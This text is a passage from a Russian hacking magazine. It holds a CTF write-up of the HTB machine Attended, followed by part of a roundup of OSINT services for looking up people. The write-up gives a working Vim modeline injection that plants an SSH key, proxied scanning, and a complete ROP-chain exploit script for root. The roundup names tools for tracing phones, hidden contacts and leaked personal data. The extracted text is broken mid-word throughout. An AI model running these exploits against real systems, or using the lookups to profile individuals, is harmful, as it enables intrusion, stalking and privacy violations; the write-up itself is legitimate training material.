книги хакеры / журнал хакер / xa-266_Optimized

ПРОДВИЖЕНИЕ

Вот мы и пробрались­ на машину. Сразу­ обращаем­ внимание­ на пользовате­ ­ лей, у которых есть домашние­ каталоги­ , а также­ отмечаем­ , что директория­ shared доступна­ нам для записи, но не для чтения­ .

Содер­ жимое­ директории­ /home

В домашней­ директории­ пользовате­ ­ля находим еще одну интерес­ ­ную дирек ­ торию — tmp — и не менее интерес­ ­ный файл gchecker.py. Оказыва­ ­ется, код имитиру­ ­ет читающе­ ­го сообщения­ и отвечающе­ ­го нам пользовате­ ­ля. В том же файле­ находим функцию­ , которая проверя­ ­ет, не кидаем­ ли мы реверс шелл. Но еще интерес­ ­нее файл .config.swp.

Содер­ жимое­ домашней­ директории­ пользовате­ ля­ guly

Функция­ checkmsf из gchecker.py

Это файл обмена­ Vim, который создает­ ­ся сразу­ при открытии­ файла­ , в дан ­ ном случае­ config. По содержимому­ мы понимаем­ , что это конфиг­ SSH, в котором указан­ пользователь­ freshness.

Содер­ жимое­ файла­ .confg.swp

Посколь­ ­ку мы имеем­ право­ на запись в директории­ share, которая принад­ ­ лежит группе­ freshness, и создан­ файл обмена­ Vim для конфига­ SSH поль ­ зователя­ freshness, получается­ , что мы можем записать конфиг­ /home/ share/config пользовате­ ля­ freshness.

В этом случае­ нас интересу­ ­ет директива­ ProxyCommand, которая позволит­ выполнить­ команду­ . Команда­ очевид­ на­ — попробу­ ем­ для любого хоста­ (Host *) записать публичный­ ключ SSH (ProxyCommand echo ...), который сге ­ нерируем­ командой­ ssh-keygen. Чтобы­ не экраниро­ вать­ всякие­ специаль­ ные­ символы­ в нашем экспло­ ­ите, просто­ отправим­ сообщение­ со следующим­ вложени­ ­ем (нужно­ только­ вставить­ свой SSH-ключ).

:!echo "Host *" >> /home/shared/config; echo " ProxyCommand echo

'ssh-rsa AA....' > ~/.ssh/authorized_keys" >> /home/shared/config ||

" vi:fen:fdm=expr:fde=assert_fails("source\!\ \%"):fdl=0:fdt="

Спустя­ некоторое­ время­ подклю­ чаем­ ся­ по SSH с приват­ ным­ ключом­ .

Флаг пользовате­ ля­

ЛОКАЛЬНОЕ ПОВЫШЕНИЕ ПРИВИЛЕГИЙ

В домашней­ директории­ пользовате­ ­ля находим директорию­ authkeys, содержащую­ бинарный­ файл и записку­ . В записке­ сказано­ , что команда­ authkeys не работает­ на attended, но работает­ на attendedgw. Эту запись мы обнаружим­ в файле­ /etc/hosts, что означает­ наличие второго­ хоста­ .

Содер­ жимое­ директории­ authkeys

Содер­ жимое­ файла­ /etc/hosts

Нашли­ новый хост — сканиру­ ем­ порты­ ! Для этого­ нужно­ проксировать­ трафик­ через уже доступный­ хост с помощью SSH. Локальный­ прокси­ сервер­ будет принимать­ соединение­ на порт 22222:

ssh -i id_rsa freshness@attended.htb -D 22222 -N

Перенап­ равле­ ние­ настро­ им­ с помощью proxychains. Для этого­ добавим запись socks4 127.0.0.1 22222 в конец файла­ /etc/proxichains.conf.

Затем сканиру­ ­ем с помощью Nmap:

proxychains -q nmap 192.168.23.1 --min-rate=500

Откры­ ­тые порты­ на хосте­ attendedgw

Было­ сказано­ , что скрипт не работает­ для SSHD, давай взглянем­ на файл /etc/ssh/sshd_config. Он содержит­ закомменти­ ­рован­ную опцию

AuthorizedKeysCommand.

Содер­ ­жимое файла­ /etc/ssh/sshd_confg

AuthorizedKeysCommand предос­ тавля­ ет­ возможность­ авторизо­ вать­ поль ­ зователя­ без добавления­ публично­ го­ ключа­ в файл authorized_keys, при этом предполага­ ­ется, что ключ хранит­ ­ся где то на удален­ ­ном сервере­ . Также­ должна­ быть прописа­ ­на опция AuthorizedKeysCommandUser, где ука ­ зывается­ пользователь­ , от имени­ которого­ будет запускать­ ся­ скрипт (у нас это root, то есть мы нашли­ верный­ путь к повышению­ привиле­ гий­ ). На вход скрипту­ передаются­ следующие­ токены:

•%f — цифровой­ отпечаток­ (fngerprint) ключа­ или сертифика­ ­та;

•%h — домашняя­ директория­ пользовате­ ­ля;

•%t — тип ключа­ или сертифика­ ­та;

•%k — ключ или сертификат­ для авториза­ ­ции, закодирован­ ­ный в Base64.

То, что программа­ принима­ ет­ на вход только­ четыре аргумен­ та­ , становит­ ся­ ясно и после­ ее анализа­ в дизассем­ бле­ ре­ (я использую­ IDA Pro): она выводит соответс­ тву­ ющее­ сообщение­ . Перед тем как дизассем­ бли­ ровать­ , сначала­ загружа­ ем­ исполняемый­ файл на свой хост:

scp -i id_rsa freshness@attended.htb:~/authkeys/authkeys ./

Разделение­ строк реализова­ но­ символом­ 0x0A, поэтому­ IDA учитыва­ ет­ их как одну строку­ . Но можно­ заменить их привыч­ ным­ символом­ окончания­ стро ­ ки — 0. Тогда­ поведение­ программы­ станет­ немного­ понятнее­ .

Строки­ , представ­ ленные­ в программе­ изначаль­ но­

Строки­ после­ замены символа­ окончания­ строки­

Провер­ ка­ количества­ аргумен­ тов­ и вывод соответс­ тву­ юще­ го­ сообщения­

Разбира­ ясь­ с кодом, не забываем­ учитывать­ уже имеющуюся­ информацию­ о принима­ емых­ аргумен­ тах­ . Так как последний­ аргумент­ должен­ быть пред ­

ставлен­ в формате­ Base64, мы можем сразу­ найти­ функцию­ , которая выпол ­ няет кодирование­ . Обрати­ внимание­ , что осущест­ вля­ ется­ копирование­

в буфер размером­ 0x300 байт, а после­ этого­ — потенциаль­ ­ное перепол ­ нение буфера.

Первые­ блоки­ функции­ обработ­ ки­ четверто­ го­ аргумен­ та­

Последний­ блок функции­ обработ­ ки­ четверто­ го­ аргумен­ та­

Проверим­ теорию с переполнени­ ­ем, для чего скопиру­ ­ем исполняемый­ файл в каталог /tmp. Чтобы­ определить­ смещение­ , по которому­ стоит­ произво­ ­дить перезапись­ , сгенери­ ­руем последова­ ­тель­ность де Брёйна­ с помощью биб ­

лиотеки­ pwntools.

Генери­ рова­ ние­ последова­ тель­ нос­ ти­ де Брёйна­

Теперь­ запустим­ программу­ в отладчике­ GDB и передадим­ четвертым­ параметром­ нашу строку­ . После­ того как программа­ упадет­ , проверим­ дан ­ ные по регистру­ RSP. Видим часть нашей строки­ и копируем­ первые­ четыре байта­ , которые передаем­ обратно в скрипт cyclic, чтобы­ определить­ сме ­ щение.

Запуск­ программы­ в отладчике­

Определе­ ние­ смещения­

Так как тут есть уязвимость­ переполнения­ буфера, давай добьемся­ выпол ­ нения команд на хосте­ . В этом нам помогут ROP-цепочки­ . Об этой технике­

в «Хакере» уже многок­ ­ратно писали, так что не будем повторять­ ­ся. Сначала­ получим все цепочки­ с помощью утилиты­ ROPgadget.

ROPgadget --binary authkeys

Обнаружен­ ные­ гаджеты­

В списке­ гаджетов­ находим syscall. С помощью его мы и выполним­ команду­ операци­ онной­ системы­ , вызвав­ функцию­ execve. Но сначала­ разберем­ ся­ с условиями­ правиль­ ной­ работы, а именно­ с содержимым­ регистров­ при вызове syscall:

•RAX — содержит­ номер вызова (для execve — 59);

•RDI — первый­ аргумент­ функции­ (указатель­ на команду­ );

•RSI — второй­ аргумент­ функции­ (указатель­ на массив­ argv[]);

•RDX — третий­ аргумент­ функции­ (указатель­ на массив­ envp[]).

Первым­ делом разберем­ ся­ с регистром­ RAX, куда нам нужно­ поместить­ зна ­ чение 59. Для работы с ним мы можем использовать­ два гаджета­ : побитовый­ сдвиг вправо­ и побитовое­ отрицание­ .

0x0000000000400394 : mov eax, 0xffffffff ; xor rcx, rcx ; ret

0x000000000040036d : not al ; adc cl, 0xe8 ; ret

0x0000000000400370 : shr eax, 1 ; ret

Сначала­ установим­ значение­ регистра­ 0xffffffff, потом выполним­ 24 сдви ­ га, чтобы­ обособить­ один байт со значени­ ем­ 0xff, то есть 11111111 (тогда­ как нам нужно­ 0x3b или 111011). Потом выполним­ ряд операций­ по преобра­ ­ зованию­ :

mov_eax = pack('<Q', 0x0000000000400394)

not_al = pack('<Q', 0x000000000040036d)

shr_eax = pack('<Q', 0x0000000000400370)

SET_RAX = mov_eax

for i in range(24):

SET_RAX += shr_eax	# RAX = 11111111
SET_RAX += shr_eax	# RAX = 01111111
SET_RAX += not_al	# RAX = 10000000
for i in range(3):
SET_RAX += shr_eax	# RAX = 00010000
SET_RAX += not_al	# RAX = 11101111
SET_RAX += shr_eax	# RAX = 01110110
SET_RAX += shr_eax	# RAX = 00111011

Таким­ образом­ мы устанав­ ­лива­ем значение­ 59 в регистре­ RAX. Теперь раз ­ бираемся­ с командой­ . Будем писать SSH-ключ в файл authorized_keys (для тестирова­ ­ния пишем в локальную­ директорию­ ). Здесь важно­ определить­ ­ся c адресом­ , по которому­ будут записаны­ наши данные­ . Тут это сделать­ просто­ : статичес­ ­кая переменная­ , куда будет записана­ декодирован­ ­ная строка­ , рас ­ положена­ после­ уже заданных­ строк по адресу­ 0x6010c0. Начнем­ нашу наг ­ рузку с выбранной­ команды­ и ее аргумен­ ­тов, тогда­ они будут расположе­ ­ны по этому­ адресу­ . Тогда­ мы сможем­ легко­ вычислить­ и их смещения­ , которые мы расположим­ после­ строк. Завершим­ нагрузку­ еще двумя­ адресами­ : адре ­ сом массива­ строк и адресом­ массива­ указате­ ­лей на эти же строки­ .

def to_addr(s):

return s + b'\x00'*(8 - len(s)%8)

def to_float(addr):

s= pack('<f', addr)

s+= b'\x00' * (8-len(s)) return s

command = [

to_addr(b"/bin/sh"),

to_addr(b"-c"),

to_addr(b"echo 'qweewqqweewq' >> /tmp/authorized_keys")

]

payload_address = 0x6010c0

command_offset = 0

payload = b"".join(command) + pack('<Q', 0x00)

pointer_offset = len(payload)

payload += pack('<Q', payload_address	)
payload += pack('<Q', payload_address	+ len(command[0]) )
payload += pack('<Q', payload_address	+ len(command[0]) + len(command
[1]) )
payload += pack('<Q', 0x00000000)
offsets = len(payload)
payload += to_float(payload_address)
payload += to_float(payload_address +	pointer_offset)

Теперь­ займем­ ся­ установ­ кой­ значений­ регистров­ RDI, RSI и RDX. Тут было очень сложно­ определить­ цепочку­ гаджетов­ , но все же выделяем­ следующие­ :

0x000000000040037b : movss xmm0, dword ptr [rdx] ; mov ebx,

0xf02d0ff3 ; ret

0x0000000000400380 : cvtss2si esi, xmm0 ; ret

0x0000000000400367 : mov rdi, rsi ; pop rdx ; ret

0x000000000040036a : pop rdx ; ret

Коман­ ­да movss копирует­ младшее­ упакован­ ­ное веществен­ ­ное значение­

из операн­ ­да источника­ в младшее­ 32-битное­ поле операн­ ­да назначения­ (в нашем случае­ из RDX в xmm0). Команда­ cvtss2si преобра­ ­зует младшее­ короткое­ веществен­ ­ное значение­ из операн­ ­да в памяти в знаковое­ 32-бит ­ ное целочисленное­ значение­ и помещает­ результат­ в 32-битный­ регистр общего­ назначения­ (у нас из xmm0 в esi). Так можно­ задать значение­ регис ­ тра RSI. А третий­ гаджет­ поможет перенести­ его в RDI. Значение­ регистра­ RDX можно­ обнулить­ . Но вот в чем была проблема­ : цепочка­ начинается­

с переноса­ значения­ из регистра­ RDX, но нет гаджета­ для переноса­ значения­

в него. Что делать? Мне пришлось­			прокон­ суль­	тировать­	ся­ со знатоком­		,
который дал подсказ­	ку­ : посмотреть­		на саму	программу­		. При выходе
из текущего­ блока­ RDX указыва­		ет­ на payload_address + 768.

Последний­ блок функции­ обработ­ ки­ четверто­ го­ аргумен­ та­

А значит­ , мы можем задать значение­ payload_address + offsets по сме ­

щению payload_address + 768.

# ... payload_address + 768 ...

payload += pack('<Q', payload_address +		offsets)
SET_RDI = pack('<Q',	0x000000000040037b	) + pack('<Q',
0x0000000000400380 )	+ pack('<Q', 0x0000000000400367 )
SET_RSI = pack('<Q',	payload_address + offsets + 0x8) + pack('<Q',
0x000000000040037b )	+ pack('<Q', 0x0000000000400380 )
SET_RDX = pack('<Q',	0x000000000040036a	) + pack('<Q', 0x00 )

И в конце­ добавляем­ вызов syscall:

# 0x00000000004003cf : syscall

SYSCALL = pack('<Q', 0x00000000004003cf )

Теперь­ собираем­ все воедино­ :

•сначала­ идет массив­ строк, составля­ ­ющий нашу команду­ ;

•затем­ идет массив­ указате­ ­лей на каждую­ строку­ ;

•затем­ расположе­ ­ны два указате­ ­ля на массивы­ строк и указате­ ­лей на стро ­ ки;

•далее­ вставляем­ дополнение­ до 768 символов­ ;

•теперь­ по данному­ смещению­ указыва­ ­ем адрес массива­ указате­ ­лей, который будет извлечен­ в регистр RDX;

•запол­ ­няем регистр RAX (номер execve);

•запол­ ­няем регистр RDI из RDX (указатель­ на указатель­ на главную­ коман ­ ду);

•запол­ ­няем регистр RSI (указатель­ на массив­ аргумен­ ­тов);

•зануля­ ­ем RDX;

•вызыва­ ­ем syscall.

from struct import pack

import base64

def to_addr(s):

return s + b'\x00'*(8 - len(s)%8)

def to_float(addr):

s= pack('<f', addr)

s+= b'\x00' * (8-len(s)) return s

command = [

to_addr(b"/bin/sh"),

to_addr(b"-c"),

to_addr(b"echo 'qweewqqweewq' >> /tmp/authorized_keys")

]

payload_address = 0x6010c0

payload = b""

mov_eax = pack('<Q', 0x0000000000400394)

not_al = pack('<Q', 0x000000000040036d)

shr_eax = pack('<Q', 0x0000000000400370)

SET_RAX = mov_eax

for i in range(24):

SET_RAX += shr_eax	# RAX = 11111111
SET_RAX += shr_eax	# RAX = 01111111
SET_RAX += not_al	# RAX = 10000000
for i in range(3):
SET_RAX += shr_eax	# RAX = 00010000
SET_RAX += not_al	# RAX = 11101111
SET_RAX += shr_eax	# RAX = 01110110
SET_RAX += shr_eax	# RAX = 00111011
payload = b""
payload = b"".join(command) + pack('<Q', 0x00)

pointer_offset = len(payload)

payload += pack('<Q', payload_address	)
payload += pack('<Q', payload_address	+ len(command[0]) )
payload += pack('<Q', payload_address	+ len(command[0]) + len(command
[1]) )
payload += pack('<Q', 0x00 )
offsets = len(payload)
payload += to_float(payload_address)
payload += to_float(payload_address +	pointer_offset)

payload += pack('<Q', 0x00 ) * ((0x0300 - len(payload))//8)

payload += pack('<Q', payload_address + offsets)

payload += SET_RAX

payload += pack('<Q', 0x000000000040037b ) + pack('<Q',

0x0000000000400380 ) + pack('<Q', 0x0000000000400367 ) # SET_RDI

payload += pack('<Q', payload_address + offsets + 0x8) + pack('<Q',

0x000000000040037b ) + pack('<Q', 0x0000000000400380 ) # SET_RSI

payload += pack('<Q', 0x000000000040036a ) + pack('<Q', 0x00 ) #

SET_RDX

payload += pack('<Q', 0x00000000004003cf ) # SYSCALL

print(base64.b64encode(payload).decode())

Не забываем­ добавить кодирование­ в Base64.

Создание­ нагрузки­

./authkeys 1 2 3 L2Jpb...

Тест нагрузки­

Нагрузка­ отлично отрабаты­ вает­ , осталось­ упаковать­ ее как ключ SSH, так как в токене %k будет передан именно­ он. Изменим­ команду­ записи, указав­

в ней реальный­ публичный­ ключ SSH и путь к файлу­ /root/.ssh/ authorized_keys. И добавим в код упаков­ ку­ в ключ SSH вместо­ строки­ вывода print(base64.b64encode(payload).decode()):

from Crypto.PublicKey.RSA import construct

import binascii

e = 65537

n = int(binascii.hexlify(payload), 16)

import os

key = construct((n, e), consistency_check=False)

print(key.exportKey(format="OpenSSH"))

Резуль­ тат­ работы скрипта­

Теперь­ выполним­ первое­ подклю­ чение­ с этим ключом­ , чтобы­ записать наш публичный­ . Затем выполним­ второе­ подклю­ чение­ уже с нашим приват­ ным­ ключом­ .

proxychains -q ssh -i test_key root@192.168.23.1

proxychains -q ssh -i id_rsa root@192.168.23.1

Флаг рута

Все прошло­ гладко­ . Машина захвачена­ , и у нас есть над ней полный­ контроль­ .

Скандалы­ , связан­ ные­ с утечкой­ или пробивом­ данных­ , слу ­ чаются­ регулярно­ . И если подкупать­ сотрудни­ ка­ банка­ , чтобы­ тот выдал нужную­ информацию­ , однозначно­ зло, то по открытым­ для всех источникам­ искать пока можно­ . Сегод ­ ня мы рассмот­ рим­ пару десятков­ сервисов­ , которые поз ­ воляют­ собрать­ информацию­ о человеке­ , не платя­ за это и (в общем случае­ ) не нарушая закон.

OSINT (Open Source INTelligence) — это разведка­ по открытым­ источникам­ , то есть поиск информации­ о человеке­ или организа­ ции­ по базам данных­ , которые доступны­ всем. Этим занимаются­ как специаль­ ные­ организа­ ции­ и службы­ , так и компании­ (чтобы­ проверить­ сотрудни­ ков­ или узнать больше­

о конкурен­ тах­ ) и просто­ люди, когда­ хотят получше­ узнать, с кем они обща ­ ются в интернете­ и не окажет­ ся­ ли «серцеед­ 888» маньяком­ убийцей­ .

Мы собрали­ список­ сервисов­ , которые помогут в этом. Упор сделан­ на сайты­ , ориенти­ рован­ ные­ на РФ, посколь­ ку­ в разных­ странах­ форматы­ дан ­ ных отличают­ ся­ и это затрудня­ ет­ поиск.

Несан­ кци­ они­ рован­ ный­ сбор персональ­ ной­ информации­ — это нарушение­ закона «О пер ­ сональных­ данных­ » и других­ законов РФ. Также­ подобные­ действия­ могут образовать­ состав­ преступле­ ния­ по статье 137 УК РФ «Нарушение­ неприкос­ новен­ ности­ частной­ жизни­ ». Ни автор, ни редакция­ не несут ответствен­ ности­ за любые последс­ твия­ использования­ приведен­ ных­ в этой публикации­ сведений­ . Вся информация­ пред ­ ставлена­ исключитель­ но­ ради информирова­ ния­ читателя­ .

Надеем­ ся­ , эта подборка­ позволит­ читателю­ накопать много­ полезной­ информации­ , а возможно­ , даже избежать­ проблем­ . Однако­ , если у тебя воз ­ никнут сомнения­ в законности­ твоих­ действий­ , помни­ , что никогда­ не поздно­ прекратить­ . В любом случае­ ты действу­ ешь­ на свой страх и риск.

ПОИСК ПО EMAIL

Emailsherlock.com — автомати­ чес­ кий­ поиск по email-адресу­ . Найдет­ ,

к каким сайтам­ привязан­ адрес почты­ .

Провер­ ­ка по несколь­ ­ким почтам­ дала не так много­ результатов­ , как хотелось бы. Поиск ограничен­ только­ самыми популярными­ сайтами­ (соцсети­ ). Еще из минусов – сайт по черному­ пиарит сторон­ ­ние сервисы­ , не все из которых даже живы, но почти­ все просят­ денег.

Emailrep.io находит, на каких сайтах­ зарегистри­ ­рова­ны аккаунты­ , исполь ­

зующие определен­ ную­ почту­ .

Провер­ ка­ репутации­ ящика­

Допол­ нитель­ но­ на основе­ провер­ ки­ по спам базам, а также­ базам вредонос­ ­ ной активности­ сервис­ проверя­ ет­ репутацию­ аккаунта­ : в частнос­ ти­ , не попадался­ ли он в утечках­ .

Продолжение статьи →

ВЫБИРАЕМ МОЩНЫЕ И БЕСПЛАТНЫЕ СЕРВИСЫ ДЛЯ ПРОБИВА И КОНКУРЕНТНОЙ РАЗВЕДКИ

ПОИСК ПО НИКНЕЙМУ

Часто­ поиск по email не дает много­ результатов­ . В таких случаях­ стоит­ поис кать по никней­ ­му (часть до @) — обычно­ информации­ становит­ ­ся в разы боль ­ ше.

WhatsMyName — это не просто­ сервис­ , а целый комбайн­ , который ищет

по 280 сервисам­ !

WhatsMyName

Здесь можно­ сортировать­ сервисы­ по категориям­ , а еще есть возможность­ экспортировать­ результат­ поиска­ (URL найден­ ­ных профилей­ ) в несколь­ ­ких форматах­ .

Сервис­ Usersearch.org предос­ тавля­ ет­ поиск не только­ по популярным­

соцсетям­ , но и по тематичес­ ким­ форумам и сайтам­ знакомств­ .

USERSEARCH.ORG

Выдача­ удобна­ тем, что ты не только­ получаешь­ список­ сервисов­ со ссылкой­ на аккаунт­ , но и для каждого­ сервиса­ есть ссылка­ на страницу­ удаления­ акка ­ унта, на случай­ , если это вдруг твой аккаунт­ . Также­ сервис­ может допол ­ нительно­ искать по телефону­ , email и пробивать­ по базе HIBP.

SuIP.biz — постоян­ но­ обновляемая­ и обширная база сервисов­ с удобной­

выдачей. Время­ провер­ ки­ — где то одна две минуты. Минус — деления на категории­ нет.

suIP.biz

По завершении­ поиска­ можно­ скачать­ отчет в формате­ PDF.

Instant Username Search — сервис­ с быстрой­ провер­ ­кой по популяр ­

ным и не очень сервисам­ . У него в базе встречают­ ­ся интерес­ ­ные тематичес­ ­

кие сайты­ , вроде­ MyAnimeList и Last.fm.

InstantUsernameSearch

Checkuser ищет по небольшому­ списку­ сайтов­ , а кроме­ того, позволя­ ет­ про ­

верять занятость доменного­ имени­ .

На сам поиск уходит­ пример­ ­но минута. Единый­ список­ ссылок­ из результатов­ получить нельзя­ .

Namechekup использует­ обширный список­ сервисов­ для провер­ ­ки,

которая, кстати­ , не занимает­ много­ времени­ .

Получить­ все ссылки­ разом здесь тоже нельзя­ .

Список­ веб сервисов­ у Namecheckr небольшой­ , но и провер­ ка­ очень

быстрая­ . Сами сервисы­ по большей­ части­ популярные­ и не очень соцсети­ . Проверя­ ет­ и некоторые­ домены.

Отдель­ ­но существу­ ­ет сервис­ двойник­ под незамысловатым­ названи­ ­ем Namech_k. Он проверят­ упомина­ ­ние конкрет­ ­ного юзерней­ ­ма по десяткам­

сайтов­ . К тому же у сервиса­ есть свой API, чтобы­ можно­ было вызывать из скриптов­ .

Namech_k

В репозитории­ нашего соотечес­ ­твен­ника (и автора­ статьи в «Хакере») Soxoj есть большой­ список­ проверок­ , которые могут быть полезны­ для интернет розыска­ , и сервисов­ поиска­ по никней­ ­му — спасибо­ ему! Здесь собраны­ такие утилиты­ , как Sherlock, Maigret, Snoop, sherlock-go

и Investigo, каждая­ из которых зарекомен­ довала­ себя как неплохой­ инстру­ ­ мент для поиска­ и сбора­ открытых­ данных­ .

Чек лист Soxoj

Отдель­ но­ хотелось бы выделить и упомянуть­ утилиту­ Maigret.

Maigret

Она позволя­ ­ет собирать досье на человека­ по имени­ пользовате­ ­ля, проверяя­ наличие учетных­ записей на огромном количестве­ сайтов­ (более 2300) и собирая всю информацию­ с доступных­ страниц­ . Не использует­ никаких клю ­ чей API. Это, кстати­ , форк другой­ OSINT-утилиты­ — Sherlock. Обрати­ вни ­ мание, что по умолчанию­ поиск запускает­ ­ся не по всем сайтам­ , а только­ по 500 самых популярных­ .

Читай­ также­ : «Пробей­ меня полностью­ ! Кто, как и за сколько­ пробива­ ет­ персональ­ ные­ данные­ в России­ », «Боты­ атакуют­ . Тестиру­ ем­ телег ­ рам боты для поиска­ персональ­ ных­ данных­ »

Продолжение статьи →

ВЫБИРАЕМ МОЩНЫЕ И БЕСПЛАТНЫЕ СЕРВИСЫ ДЛЯ ПРОБИВА И КОНКУРЕНТНОЙ РАЗВЕДКИ

ПОИСК ПО НОМЕРУ ТЕЛЕФОНА

SpravkaRU.Net — весьма­ объемный­ телефонный­ справоч­ ник­ , который

может искать также­ по ФИО.

К сожалению­ , домашними­ телефонами­ уже мало кто пользует­ ­ся, а телефон ­ ные справоч­ ­ники по большей­ части­ ориенти­ ­рова­ны именно­ на них. Поэтому­ объемы­ информации­ не такие уж впечат­ ­ляющие.

Microsoft позволя­ ­ет проверять­ привяз­ ­ку номера к аккаунту­ на сайте­ account.live.com. Этим можно­ пользовать­ ­ся!

Email2phonenumber собирает­ данные­ со страниц­ восста­ нов­ ления­ аккаунта­

во множес­ тве­ сервисов­ и находит номер телефона­ .

Помимо­ этого­ , утилита­ может генерировать­ список­ номеров и перебирать­ сервисы­ на наличие номера телефона­ (где он указан­ в профиле­ ).

Бот last4mailbot найдет­ последние­ четыре цифры­ номера телефона­ кли ­

ента Сбербанка­ .

last4mailbot

Поиск­ произво­ дит­ ся­ исключитель­ но­ по email. Провер­ ка­ несколь­ ких­ почт, заведомо­ привязан­ ных­ к Сбербанку­ , показала­ , что бот действи­ тель­ но­ выдает­ верные­ данные­ .

ПОИСК ПО ФИО

Vk-express умеет­ сле­дить присматри­ ­вать за аккаунтом­ ВК. После­ добав ­

ления в базу сайта­ ссылки­ на профиль­ тот будет отслеживать­ доступные­ ава ­ тарки­ , лайки­ , коммента­ ­рии, друзей­ , группы­ и прочее­ .

Также­ ищет скрытых­ друзей­ и коммента­ рии­ пользовате­ ля­ .

Vk-photo.xyz должен­ искать частные­ фото аккаунта­ , но база сайта­ весь ­

ма мала, хоть там порой и попадаются­ интерес­ ные­ материалы­ , вроде­ фоток с другими­ личностя­ ми­ или в местах­ , информация­ о которых представ­ ляет­ интерес­ . Вдруг штатный­ сотрудник­ ФСБ спалит­ фотку­ с места­ работы?

Vk5.city4me — немного­ подозритель­ ный­ , но вполне­ рабочий сборщик­ ста ­

тистики­ активности­ пользовате­ ля­ VK. Интерфейс подозритель­ но­ похож на vkexpress. Показывает­ статис­ тику­ входов­ , с какого устройства­ заходили­ , друзей­ , коммента­ рии­ , а под настро­ ение­ может показать и группы­ пользовате­ ля­ . Бонусом вывалит скрытых­ друзей­ искомого­ анониму­ са­ .

220vk — сервис­ чисто­ аналити­ ­чес­кий. По заверениям­ автора­ (и моему

небольшому­ опыту­ ), он определит­ средний­ возраст­ друзей­ , некоторых­ скры ­ тых друзей­ , их города, дату регистра­ ции­ профиля­ и прочие­ интерес­ ные­ , но обычно­ бесполез­ ные­ показатели­ .

Еще он показывает­ друзей­ , которые скрыли­ искомый­ профиль­ у себя, то есть по каким то причинам­ скрывают­ свою связь с заданным­ аккаунтом­ .

Сервис­ может искать лайки­ и коммента­ рии­ пользовате­ ля­ , что помогает­ искать связь между­ аккаунта­ ми­ и реальными­ людьми­ . А после­ установ­ ления­ такой связи­ человека­ можно­ найти­ физически­ .

«Тут найдут­ », бывает­ , выдает­ информацию­ профиля­ несколь­ ­ко лет

назад. Иногда­ полезно­ .

Плавно­ переходим­ к поиску­ по зарубежным­ сервисам­ : если нужно­ найти­ про ­ филь человека­ в Facebook, Instagram и Twitter по имени­ и фамилии, то подой ­ дет PeekYou. Он успешно ищет по объемно­ му­ списку­ разных­ сервисов­ . Сра ­

зу предлага­ ет­ возможные­ почтовые­ адреса­ по никней­ му­ и проверя­ ет­ их тоже. Дополнитель­ но­ выдает­ людей с похожим именем­ и их адреса­ .

Продолжение статьи →

ВЫБИРАЕМ МОЩНЫЕ И БЕСПЛАТНЫЕ СЕРВИСЫ ДЛЯ ПРОБИВА И КОНКУРЕНТНОЙ РАЗВЕДКИ

АНАЛИЗ АККАУНТОВ В ЗАРУБЕЖНЫХ СЕРВИСАХ

Reddit-user-analyser, как понятно­ из названия­ , анализи­ рует­ публичные­

данные­ аккаунта­ на Reddit. Показывает­ дату регистра­ ции­ , количество­ ком ­ ментов, карму­ , сабредди­ ты­ , а также­ строит­ графики­ активности­ и показывает­ лучший­ и худший­ коммент­ .

Сервис­ redditinvestigator.com соберет полное­ досье на аккаунт­ Reddit.

В него входят­ сабредди­ ты­ , в которых активничал­ юзер, его время­ регистра­ ­ ции, график­ активности­ (позволя­ ет­ определить­ местополо­ жение­ ), куча гра ­ фиков и предположе­ ния­ на основе­ информации­ , собранной­ в аккаунте­ .

Twint — это продвинутый­ инстру­ мент­ для анализа­ аккаунтов­ Twitter, который

обходит­ ся­ без использования­ официаль­ ного­ API. В отличие­ от перечис ­ ленных веб сервисов­ , работает­ локально­ и требует­ установ­ ки­ . Он собирает­ общую информацию­ аккаунта­ , твиты­ , относящи­ еся­ к определен­ ным­ темам, хештеги­ ; находит конфиден­ циаль­ ную­ информацию­ из твитов­ , такую как элек ­ тронная­ почта­ и номера телефонов­ .

Дашборд­ Twint

Whopostedwhat.com просто­ находит посты­ в Facebook. Позволя­ ет­ быстро­

найти­ публичное­ творчес­ тво­ заданной­ личности­ .

На сайте­ есть форма­ для получения­ ID юзера­ по ссылке­ на его профиль­ , а потом по этому­ ID можно­ искать в коммента­ риях­ (глобаль­ но­ ) и его собс ­ твенным­ постам­ . Сервис­ может искать по конкрет­ ной­ дате или диапазону­ дат, умеет­ и по ключевым­ фразам­ . Позволя­ ет­ даже поиск по местам­ , но как им пользовать­ ся­ — я не разобрался­ .

Как мы уже писали­ , агрегатор­ утечек­ Have I Been Pwned уже добавил гран ­

диозный­ слив аккаунтов­ Facebook в свою базу. К сожалению­ , искать можно­ было только­ по адресу­ электрон­ ной­ почты­ , а в утечке­ он был указан­ всего­

в2,5 миллиона­ записей из 533 миллионов­ .

Смомента­ написания­ той новости­ ситуация­ немного­ изменилась­ , и теперь искать можно­ в том числе­ и по номеру телефона­ .

ПОИСК ПО ПАСПОРТУ

У Главного­ управления­ по вопросам­ миграции­ МВД есть сервис­ , на котором

можно­ проверить­ , действи­ тель­ ный­ ли перед тобой паспорт­ . База обновля ­ ется каждый­ день и будет крайне­ полезна­ всевоз­ можным­ кадровикам­ .

ПОИСК ЮРЛИЦ

Сюда­ входят­ сервисы­ провер­ ­ки юридичес­ ­ких лиц на задолженнос­ ­ти, регис ­ трацию­ компании­ и прочего­ .

Egrulbot в Telegram найдет­ все доступное­ в ЕГРЮЛ (Единый­ государс ­

твенный­ реестр юридичес­ ких­ лиц) о россий­ ских­ компани­ ях­ и индивиду­ аль­ ных­ предпри­ нима­ телях­ .

vKarmanebot ищет по УНП и названию­ организа­ ­ции. Выдает­ статус­ , УНП,

даты регистра­ ции­ и адрес.

ПОИСК АВТОМОБИЛЕЙ

Сюда­ входят­ сервисы­ , при помощи которых можно­ узнать информацию­

о регистра­ ции­ авто, расшифров­ ку­ номера VIN, страхова­ ние­ , историю­ ДТП, пробег­ и прочее­ . Будет полезно­ при покупке­ автомоби­ ля­ , а еще поможет выяснить­ , что за козел чуть не сбил тебя вчера­ на пешеходном­ переходе­ .

Сайт VIN01 ищет по госномеру­ или VIN и показывает­ историю­ регистра­

ций, ДТП, пробег­ , ОСАГО­ и многое­ другое­ .

Сайт vinformer делает­ провер­ ку­ ПТС и тот же поиск по VIN.

Продолжение статьи →

ВЫБИРАЕМ МОЩНЫЕ И БЕСПЛАТНЫЕ СЕРВИСЫ ДЛЯ ПРОБИВА И КОНКУРЕНТНОЙ РАЗВЕДКИ

КОМПЬЮТЕРНАЯ РАЗВЕДКА

